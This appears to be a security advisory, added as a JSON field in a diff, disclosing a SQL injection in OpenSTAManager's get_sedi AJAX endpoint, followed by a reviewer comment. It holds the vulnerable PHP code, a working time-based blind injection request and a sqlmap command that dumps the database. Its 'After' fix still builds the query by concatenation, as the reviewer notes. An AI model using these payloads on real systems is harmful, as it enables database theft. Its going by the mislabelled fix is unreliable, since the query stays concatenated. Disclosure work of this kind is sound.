+ "details": "## Summary\nA SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.\n\n\n## Proof of Concept\n\n### Vulnerable Code\n**File:** `modules/anagrafiche/ajax/complete.php:28`\n\n```php\ncase 'get_sedi':\n $idanagrafica = get('idanagrafica');\n $q = \"SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione \n FROM an_sedi \n WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n $rs = $dbo->fetchArray($q);\n```\n\n### Data Flow\n1. **Source:** `$_GET['idanagrafica']` → `get('idanagrafica')`\n2. **Vulnerable:** User input concatenated directly into SQL query with single quotes\n3. **Sink:** `$dbo->fetchArray($q)` executes the malicious query\n\n### Exploit\n\n**Manual PoC (Time-based Blind SQLi):**\n```http\nGET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1\nHost: localhost:8081\nCookie: PHPSESSID=<valid-session>\n```\n<img width=\"1304\" height=\"580\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8\" />\n\n**SQLMap Exploitation:**\n```bash\nsqlmap -u \"http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*\" \\\n --cookie=\"PHPSESSID=<session>\" \\\n --dbms=MySQL \\\n --technique=T \\\n --level=3 \\\n --dump\n```\n\n**SQLMap Output:**\n```\n[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\nParameter: #1* (URI)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF\nback-end DBMS: MySQL >= 5.0.12\n```\n\n<img width=\"1284\" height=\"745\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759\" />\n\n\n## Impact\n- **Data Exfiltration:** 
Complete database extraction including user credentials, customer data, financial records\n- **Privilege Escalation:** Modification of `zz_users` table to gain admin access\n- **Data Integrity:** Unauthorized modification or deletion of records\n- **Potential RCE:** Via `SELECT ... INTO OUTFILE` if file permissions allow\n\n## Affected Versions\n- OpenSTAManager: Verified in latest version (as of December 2025)\n- All versions using this endpoint are likely affected\n\n## Remediation\n\nReplace direct concatenation with prepared statements:\n\n**Before:**\n```php\n$idanagrafica = get('idanagrafica');\n$q = \"SELECT ... WHERE idanagrafica='\".$idanagrafica.\"' ...\";\n```\n\n**After:**\n```php\n$idanagrafica = get('idanagrafica');\n$q = \"SELECT ... WHERE idanagrafica=\".prepare($idanagrafica).\" ...\";\n```\n\n## Credit\nDiscovered by: Łukasz Rybak",
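Review bot: The remediation text says "Replace direct concatenation with prepared statements", but the "After" snippet still builds the query by string concatenation (`\"... WHERE idanagrafica=\".prepare($idanagrafica).\" ...\"`) and shows no parameter binding, so the label does not match the code. Either reword it to describe what `prepare()` actually does to the value (quoting/escaping) or show a genuinely parameterized query with a bound placeholder, so readers applying the fix do not take a wrapped concatenation for a prepared statement. Also, the "Affected Versions" section gives only "Verified in latest version (as of December 2025)"; naming the exact release tag or commit that was tested would let maintainers and downstream users map the advisory to concrete versions.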